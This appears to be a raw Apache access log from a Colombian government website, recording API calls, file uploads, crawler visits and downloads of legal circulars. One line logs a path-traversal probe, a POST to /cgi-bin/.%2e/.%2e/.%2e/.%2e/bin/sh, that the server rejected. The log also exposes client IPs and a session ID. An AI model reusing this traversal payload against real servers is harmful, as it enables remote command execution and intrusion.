186.102.91.132 - - [02/Apr/2022:15:17:48 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX192x9gaDxPNKaAvaMY0s29p+Qya4mtLXEzEw17AAclYTmANFGLAmDcs&u=U2FsdGVkX1/tLurYvAvAfTkdOPwQElvc8TbZULCuCO0=&y=U2FsdGVkX1/c2LC07ix5lTjrZnCZvpEwEbzihYZEHCU= HTTP/1.1" 200 70
186.102.91.132 - - [02/Apr/2022:15:17:48 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/9306SRj7mN/iY+PXL1EDWipZmuDjYKL3bh61+K/VBoDg67YqO2y9m&u=U2FsdGVkX1/tLurYvAvAfTkdOPwQElvc8TbZULCuCO0=&y=U2FsdGVkX1/c2LC07ix5lTjrZnCZvpEwEbzihYZEHCU= HTTP/1.1" 200 70
186.102.91.132 - - [02/Apr/2022:15:17:48 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/G8daJyxlKTI82L61C+Q9WoLXVacS5RuRzwtzZ20go9p0ar/vEitNT&u=U2FsdGVkX1/tLurYvAvAfTkdOPwQElvc8TbZULCuCO0=&y=U2FsdGVkX1/c2LC07ix5lTjrZnCZvpEwEbzihYZEHCU= HTTP/1.1" 200 70
186.102.91.132 - - [02/Apr/2022:15:17:48 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19uV2cax7F/jLUP6cJDCWDcQswfGadOC39Dmbw0ORoEB8cM8ftKwBUi&u=U2FsdGVkX1/tLurYvAvAfTkdOPwQElvc8TbZULCuCO0=&y=U2FsdGVkX1/c2LC07ix5lTjrZnCZvpEwEbzihYZEHCU= HTTP/1.1" 200 70
186.102.91.132 - - [02/Apr/2022:15:17:49 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/y++0LpnpA9OuIo7ldu7S/VP9lNFUusZsqUItc0eaRqo2Z+oEBjViP&u=U2FsdGVkX1/tLurYvAvAfTkdOPwQElvc8TbZULCuCO0=&y=U2FsdGVkX1/c2LC07ix5lTjrZnCZvpEwEbzihYZEHCU= HTTP/1.1" 200 70
186.102.91.132 - - [02/Apr/2022:15:17:49 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/upqg2lmI/UDmFQhG92Gh9vHeRYMRUL4I/Ci8XhTZZav8evQykNwB5&u=U2FsdGVkX1/tLurYvAvAfTkdOPwQElvc8TbZULCuCO0=&y=U2FsdGVkX1/c2LC07ix5lTjrZnCZvpEwEbzihYZEHCU= HTTP/1.1" 200 70
186.102.91.132 - - [02/Apr/2022:15:17:49 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19D+/8pGwQI/6SFRBgeeLfp2fM86sisGhRAuX+sRBZbpFxXYj10JQsm&u=U2FsdGVkX1/tLurYvAvAfTkdOPwQElvc8TbZULCuCO0=&y=U2FsdGVkX1/c2LC07ix5lTjrZnCZvpEwEbzihYZEHCU= HTTP/1.1" 200 70
186.102.91.132 - - [02/Apr/2022:15:17:49 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+y3JOeyUiJHNGMCMeGbSvokYDaZb1+HziExOA1SENkAECvHQ5qbMcb&u=U2FsdGVkX1/tLurYvAvAfTkdOPwQElvc8TbZULCuCO0=&y=U2FsdGVkX1/c2LC07ix5lTjrZnCZvpEwEbzihYZEHCU= HTTP/1.1" 200 70
186.102.91.132 - - [02/Apr/2022:15:17:49 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX192TwYdiOQkaoSkksJrIoBClRmrE2fjsFs2aI3YO5kn++kvPHMArGnA&u=U2FsdGVkX1/tLurYvAvAfTkdOPwQElvc8TbZULCuCO0=&y=U2FsdGVkX1/c2LC07ix5lTjrZnCZvpEwEbzihYZEHCU= HTTP/1.1" 200 70
186.102.91.132 - - [02/Apr/2022:15:17:50 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18VR+7TdzxAxphrORpRFHZC9cxDwX/RKbVvw1wINxkyqwglofKv2VTf&u=U2FsdGVkX1/tLurYvAvAfTkdOPwQElvc8TbZULCuCO0=&y=U2FsdGVkX1/c2LC07ix5lTjrZnCZvpEwEbzihYZEHCU= HTTP/1.1" 200 70
186.102.91.132 - - [02/Apr/2022:15:17:50 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18N/ZeoYvEyIDzcOPq+jEYz41Sru1aK6r3MjQkBSWVIEDtfo+Z93gRQ&u=U2FsdGVkX1/tLurYvAvAfTkdOPwQElvc8TbZULCuCO0=&y=U2FsdGVkX1/c2LC07ix5lTjrZnCZvpEwEbzihYZEHCU= HTTP/1.1" 200 70
186.102.91.132 - - [02/Apr/2022:15:17:50 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+nX3EWFBSmt3UnPslPS2sSM50EWsTUCuQBKtczjIDTJMQNVuOxnsdQ&u=U2FsdGVkX1/tLurYvAvAfTkdOPwQElvc8TbZULCuCO0=&y=U2FsdGVkX1/c2LC07ix5lTjrZnCZvpEwEbzihYZEHCU= HTTP/1.1" 200 70
186.102.91.132 - - [02/Apr/2022:15:17:50 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+BYlA3dSll+RUP8pCFIkkNQMloq7aacg0A4sj7Udndhgb2rlVSpFFL&u=U2FsdGVkX1/tLurYvAvAfTkdOPwQElvc8TbZULCuCO0=&y=U2FsdGVkX1/c2LC07ix5lTjrZnCZvpEwEbzihYZEHCU= HTTP/1.1" 200 70
186.102.91.132 - - [02/Apr/2022:15:17:50 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1832Qngyz0fcsT4j4A37D70EDxIKZQ3J4hEBMCj8n721z0owB2yL6GdXwe99kFz3dM+1UcLvNlqbeWqXrZzT3jwelU+SYvVG3bHyZfyBJeWSUykeQDk2BfNaPii/BWJ/5ukuqdK0qNuH/sDdAVKR/yLJ4X+lYHcfEcpuytvvGkqOmWzIalfPmyOouSIxPzqxbUqD9Cuqq+ym58tJ0IAA6Xd+ICGrFn5RgBrwVSZN6V9r2Bt0lhnp3c6ZXff5qBth5nZH8EOl0JaXgTDn3WV86GnqR3Rp2h1BoUXmVIeZ8+fpUqpyzIik6cQsd7NV5aYg8iAkee/d3lqGw==&u=U2FsdGVkX1/tLurYvAvAfTkdOPwQElvc8TbZULCuCO0=&y=U2FsdGVkX1/c2LC07ix5lTjrZnCZvpEwEbzihYZEHCU= HTTP/1.1" 200 196
186.102.91.132 - - [02/Apr/2022:15:17:50 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX19sTR180QmQV86sd5P7O6ucqDsvs6d3Z/fAyK2HwbKiurUO71W4SYOW HTTP/1.1" 200 30975
172.22.2.4 - - [02/Apr/2022:15:16:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.102.34.7 - - [02/Apr/2022:15:18:49 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.34.7 - - [02/Apr/2022:15:18:49 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.102.34.7 - - [02/Apr/2022:15:18:55 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.34.7 - - [02/Apr/2022:15:18:55 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.102.34.7 - - [02/Apr/2022:15:19:01 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.34.7 - - [02/Apr/2022:15:19:01 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.102.34.7 - - [02/Apr/2022:15:19:08 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.34.7 - - [02/Apr/2022:15:19:08 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.102.34.7 - - [02/Apr/2022:15:19:18 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
172.22.2.4 - - [02/Apr/2022:15:17:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58588
186.102.34.7 - - [02/Apr/2022:15:19:18 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.102.34.7 - - [02/Apr/2022:15:19:26 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
181.142.168.192 - - [02/Apr/2022:15:19:28 -0500] "GET /forest/ HTTP/1.1" 200 12041
186.102.34.7 - - [02/Apr/2022:15:19:26 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
181.142.168.192 - - [02/Apr/2022:15:19:36 -0500] "POST /forest/index.php HTTP/1.1" 200 12268
186.102.34.7 - - [02/Apr/2022:15:19:52 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.34.7 - - [02/Apr/2022:15:19:52 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.102.34.7 - - [02/Apr/2022:15:20:06 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.34.7 - - [02/Apr/2022:15:20:07 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.102.34.7 - - [02/Apr/2022:15:20:14 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.34.7 - - [02/Apr/2022:15:20:14 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
128.14.134.134 - - [02/Apr/2022:15:20:35 -0500] "GET / HTTP/1.1" 200 319
186.102.34.7 - - [02/Apr/2022:15:20:35 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.34.7 - - [02/Apr/2022:15:20:35 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
66.249.73.127 - - [02/Apr/2022:15:20:51 -0500] "-" 408 -
186.102.34.7 - - [02/Apr/2022:15:20:54 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.34.7 - - [02/Apr/2022:15:20:54 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.102.34.7 - - [02/Apr/2022:15:21:09 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.34.7 - - [02/Apr/2022:15:21:09 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.102.34.7 - - [02/Apr/2022:15:21:21 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.34.7 - - [02/Apr/2022:15:21:21 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
216.245.221.92 - - [02/Apr/2022:15:22:03 -0500] "HEAD / HTTP/1.1" 200 -
191.156.230.65 - - [02/Apr/2022:15:23:08 -0500] "GET /sipse/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12500
191.156.230.65 - - [02/Apr/2022:15:23:08 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 200 3230
191.156.230.65 - - [02/Apr/2022:15:23:08 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
191.156.230.65 - - [02/Apr/2022:15:23:08 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
191.156.230.65 - - [02/Apr/2022:15:23:08 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 200 12592
191.156.230.65 - - [02/Apr/2022:15:23:09 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css;jsessionid=AdFxMK5hZy5+TH+4-2zt5XNw.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 542
191.156.230.65 - - [02/Apr/2022:15:23:08 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
191.156.230.65 - - [02/Apr/2022:15:23:09 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css;jsessionid=AdFxMK5hZy5+TH+4-2zt5XNw.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
191.156.230.65 - - [02/Apr/2022:15:23:09 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js;jsessionid=AdFxMK5hZy5+TH+4-2zt5XNw.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
191.156.230.65 - - [02/Apr/2022:15:23:09 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js;jsessionid=AdFxMK5hZy5+TH+4-2zt5XNw.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
191.156.230.65 - - [02/Apr/2022:15:23:09 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js;jsessionid=AdFxMK5hZy5+TH+4-2zt5XNw.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
191.156.230.65 - - [02/Apr/2022:15:23:09 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js;jsessionid=AdFxMK5hZy5+TH+4-2zt5XNw.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
191.156.230.65 - - [02/Apr/2022:15:23:10 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 200 5355
191.156.230.65 - - [02/Apr/2022:15:23:10 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
191.156.230.65 - - [02/Apr/2022:15:23:10 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
191.156.230.65 - - [02/Apr/2022:15:23:11 -0500] "GET /sipse/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/index.xhtml HTTP/1.1" 200 677
191.156.230.65 - - [02/Apr/2022:15:23:11 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
191.156.230.65 - - [02/Apr/2022:15:23:11 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [02/Apr/2022:15:22:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43365
201.245.192.253 - - [02/Apr/2022:15:23:21 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45616
172.22.2.4 - - [02/Apr/2022:15:22:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2022:15:23:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
216.245.221.92 - - [02/Apr/2022:15:27:03 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.97 - - [02/Apr/2022:15:28:30 -0500] "-" 408 -
172.22.2.4 - - [02/Apr/2022:15:27:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
172.22.2.4 - - [02/Apr/2022:15:28:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2022:15:29:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54090
23.100.232.233 - - [02/Apr/2022:15:31:30 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
23.100.232.233 - - [02/Apr/2022:15:31:30 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
23.100.232.233 - - [02/Apr/2022:15:31:31 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
207.46.13.179 - - [02/Apr/2022:15:32:02 -0500] "GET /forest/ HTTP/1.1" 200 12041
216.245.221.92 - - [02/Apr/2022:15:32:03 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Apr/2022:15:32:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43365
201.245.192.253 - - [02/Apr/2022:15:33:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45616
66.249.73.127 - - [02/Apr/2022:15:34:37 -0500] "-" 408 -
172.22.2.4 - - [02/Apr/2022:15:34:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2022:15:35:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 46066
216.245.221.92 - - [02/Apr/2022:15:37:03 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2022:15:35:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 46458
207.46.13.157 - - [02/Apr/2022:15:38:23 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
172.22.2.4 - - [02/Apr/2022:15:39:09 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000003%20DEL%2007%20DE%20MARZO%20DEL%202022.pdf HTTP/1.1" 404 1038
172.22.2.4 - - [02/Apr/2022:15:39:13 -0500] "GET /BLA/boletinlegal/Circulares/2021/CIRCULAR%20No.%2000009%20DEL%2001%20DE%20OCTUBRE%20DEL%202021.pdf HTTP/1.1" 200 320793
172.22.2.4 - - [02/Apr/2022:15:39:21 -0500] "GET /BLA/boletinlegal/Circulares/2021/CIRCULAR%20No.%2000007%20DEL%2010%20DE%20AGOSTO%20DEL%202021.pdf HTTP/1.1" 200 266364
172.22.2.4 - - [02/Apr/2022:15:39:27 -0500] "GET /BLA/boletinlegal/Circulares/2021/CIRCULAR%20No.%2000006%20DEL%2005%20DE%20AGOSTO%20DEL%202021.pdf HTTP/1.1" 200 249615
172.22.2.4 - - [02/Apr/2022:15:39:35 -0500] "GET /BLA/boletinlegal/Circulares/2020/Circular%20No.%2000018%20del%2002%20de%20diciembre%20del%202020.pdf HTTP/1.1" 200 276868
172.22.2.4 - - [02/Apr/2022:15:39:42 -0500] "GET /BLA/boletinlegal/Circulares/2020/Circular%2000010%20del%2027%20de%20julio%20de%202020.pdf HTTP/1.1" 200 422655
172.22.2.4 - - [02/Apr/2022:15:39:51 -0500] "GET /BLA/boletinlegal/Circulares/2020/CIRCULAR%20No.%2000019%20DEL%2018%20DE%20DICIEMBRE%20DEL%202020.pdf HTTP/1.1" 200 307959
172.22.2.4 - - [02/Apr/2022:15:39:56 -0500] "GET /BLA/boletinlegal/Circulares/2020/CIRCULAR%20No.%2000014%20del%2001%20de%20septiembre%20del%202020.pdf HTTP/1.1" 200 320826
172.22.2.4 - - [02/Apr/2022:15:40:00 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%2012%20del%2014%20de%20Marzo%20de%202019.pdf HTTP/1.1" 200 344384
172.22.2.4 - - [02/Apr/2022:15:40:06 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%20006%20del%2008%20de%20Febrero%20de%202019.pdf HTTP/1.1" 200 674401
172.22.2.4 - - [02/Apr/2022:15:40:15 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%200015%20del%2003%20de%20Octubre%20de%202019.pdf HTTP/1.1" 200 165608
172.22.2.4 - - [02/Apr/2022:15:40:21 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%200005%20del%2020%20de%20Marzo%20de%202019.pdf HTTP/1.1" 200 159877
172.22.2.4 - - [02/Apr/2022:15:40:27 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%200003%20del%2031%20de%20Enero%20de%202019.pdf HTTP/1.1" 200 164676
172.22.2.4 - - [02/Apr/2022:15:40:34 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%2000020%20del%2020%20de%20diciembre%20de%202019.pdf HTTP/1.1" 200 145170
172.22.2.4 - - [02/Apr/2022:15:40:42 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%2000018%20del%2020%20de%20noviembre%20de%202019.pdf HTTP/1.1" 200 158030
172.22.2.4 - - [02/Apr/2022:15:40:47 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [02/Apr/2022:15:40:49 -0500] "GET /BLA/boletinlegal/Circulares/2018/Circular%20No.%2011%20del%2024%20de%20Septiembre%20de%202018.pdf HTTP/1.1" 200 169541
172.22.2.4 - - [02/Apr/2022:15:40:55 -0500] "GET /BLA/boletinlegal/Circulares/2018/Circular%20No.%2010%20del%2021%20de%20Septiembre%20de%202018.pdf HTTP/1.1" 200 163426
172.22.2.4 - - [02/Apr/2022:15:41:01 -0500] "GET /BLA/boletinlegal/Circulares/2018/Circular%20No.%200015%20del%207%20de%20Diciembre%20de%202018.pdf HTTP/1.1" 200 165305
172.22.2.4 - - [02/Apr/2022:15:41:08 -0500] "GET /BLA/boletinlegal/Circulares/2018/CIRCULAR%20COJUNTA%20042%20DE%202018.pdf HTTP/1.1" 200 515008
172.22.2.4 - - [02/Apr/2022:15:41:17 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%202%20del%201%20de%20Septiembre%20de%202017.pdf HTTP/1.1" 200 152575
172.22.2.4 - - [02/Apr/2022:15:41:22 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%201%20del%2030%20de%20Marzo%20de%202017.pdf HTTP/1.1" 200 668532
172.22.2.4 - - [02/Apr/2022:15:41:26 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%2007%20del%2028%20de%20Abril%20de%202017.pdf HTTP/1.1" 200 309906
172.22.2.4 - - [02/Apr/2022:15:41:31 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%20011%20del%2005%20de%20julio%20de%202017.pdf HTTP/1.1" 200 965526
172.22.2.4 - - [02/Apr/2022:15:41:40 -0500] "GET /BLA/boletinlegal/Circulares/2015/Circular%20No.%202%20del%201%20de%20julio%20de%202015.pdf HTTP/1.1" 200 752890
172.22.2.4 - - [02/Apr/2022:15:41:47 -0500] "GET /BLA/boletinlegal/Circulares/2015/Circular%20No.%201%20del%2010%20de%20Febrero%20de%202015.pdf HTTP/1.1" 200 660637
172.22.2.4 - - [02/Apr/2022:15:40:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2022:15:41:53 -0500] "GET /BLA/boletinlegal/Circulares/2014/Circular%20No.%203%20del%2014%20de%20Noviembre%20de%202014.pdf HTTP/1.1" 200 104132
172.22.2.4 - - [02/Apr/2022:15:41:58 -0500] "GET /BLA/boletinlegal/Circulares/2014/Circular%20No.%202%20del%2021%20de%20septiembre%20de%202014.pdf HTTP/1.1" 200 143376
216.245.221.92 - - [02/Apr/2022:15:42:03 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2022:15:42:03 -0500] "GET /BLA/boletinlegal/Circulares/2014/Circular%20No.%201%20del%2008%20de%20Mayo%20de%202014.pdf HTTP/1.1" 200 180124
172.22.2.4 - - [02/Apr/2022:15:42:09 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%208%20del%201%20de%20Noviembre%20de%202013.pdf HTTP/1.1" 200 385156
172.22.2.4 - - [02/Apr/2022:15:42:17 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%207%20del%201%20de%20Agosto%20de%202013.pdf HTTP/1.1" 200 340934
172.22.2.4 - - [02/Apr/2022:15:42:23 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%206%20del%2019%20de%20julio%20de%202013.pdf HTTP/1.1" 200 4210437
172.22.2.4 - - [02/Apr/2022:15:40:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58588
172.22.2.4 - - [02/Apr/2022:15:42:40 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%205%20del%2013%20de%20junio%20de%202013.pdf HTTP/1.1" 200 110904
66.249.73.127 - - [02/Apr/2022:15:43:04 -0500] "-" 408 -
186.155.14.187 - - [02/Apr/2022:15:43:13 -0500] "GET /feria-de-servicios-ambientales-viernes-1-y-sabado-2-de-abril-en-la-localidad-de-teusaquillo.html HTTP/1.1" 200 1027
201.245.192.253 - - [02/Apr/2022:15:42:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43365
201.245.192.253 - - [02/Apr/2022:15:43:20 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45616
216.245.221.92 - - [02/Apr/2022:15:47:03 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2022:15:45:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2022:15:46:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
66.220.149.19 - - [02/Apr/2022:15:49:00 -0500] "GET /images/llantas-teusaquillo-1-abril.jpg HTTP/1.1" 200 50674
207.46.13.43 - - [02/Apr/2022:15:49:10 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2010%2F HTTP/1.1" 200 274169
45.155.204.146 - - [02/Apr/2022:15:49:49 -0500] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 945
66.249.73.127 - - [02/Apr/2022:15:51:17 -0500] "-" 408 -
172.22.2.4 - - [02/Apr/2022:15:51:20 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20SENTENCIA%20T-299%20DE%202008.doc HTTP/1.1" 200 40960
173.252.127.30 - - [02/Apr/2022:15:51:34 -0500] "GET /engativa-tendra-jornada-de-recoleccion-de-llantas-este-miercoles.html?fbclid=IwAR1h4TQ6QfPlazXIoUJJqNMNrzhvpRmkPsuuobwyC2z62Bt-MINLlEnMp2c HTTP/1.1" 200 933
216.245.221.92 - - [02/Apr/2022:15:52:03 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.199 - - [02/Apr/2022:15:53:12 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2021%2F HTTP/1.1" 200 303054
172.22.2.4 - - [02/Apr/2022:15:51:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2022:15:52:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54457
54.75.149.105 - - [02/Apr/2022:15:55:06 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
54.75.149.105 - - [02/Apr/2022:15:55:06 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
54.75.149.105 - - [02/Apr/2022:15:55:06 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
54.75.149.105 - - [02/Apr/2022:15:55:06 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
54.75.149.105 - - [02/Apr/2022:15:55:06 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
54.75.149.105 - - [02/Apr/2022:15:55:07 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
54.75.149.105 - - [02/Apr/2022:15:55:07 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
54.75.149.105 - - [02/Apr/2022:15:55:07 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
54.75.149.105 - - [02/Apr/2022:15:55:07 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
54.75.149.105 - - [02/Apr/2022:15:55:07 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
54.75.149.105 - - [02/Apr/2022:15:55:07 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
54.75.149.105 - - [02/Apr/2022:15:55:07 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
54.75.149.105 - - [02/Apr/2022:15:55:07 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
54.75.149.105 - - [02/Apr/2022:15:55:07 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
54.75.149.105 - - [02/Apr/2022:15:55:07 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
54.75.149.105 - - [02/Apr/2022:15:55:07 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
54.75.149.105 - - [02/Apr/2022:15:55:08 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
54.75.149.105 - - [02/Apr/2022:15:55:08 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
54.75.149.105 - - [02/Apr/2022:15:55:08 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
54.75.149.105 - - [02/Apr/2022:15:55:09 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
54.75.149.105 - - [02/Apr/2022:15:55:06 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 16331
66.249.73.127 - - [02/Apr/2022:15:56:59 -0500] "-" 408 -
216.245.221.92 - - [02/Apr/2022:15:57:03 -0500] "HEAD / HTTP/1.1" 200 -
64.31.8.158 - - [02/Apr/2022:15:58:25 -0500] "GET / HTTP/1.1" 200 319
186.102.54.8 - - [02/Apr/2022:15:59:06 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.54.8 - - [02/Apr/2022:15:59:07 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
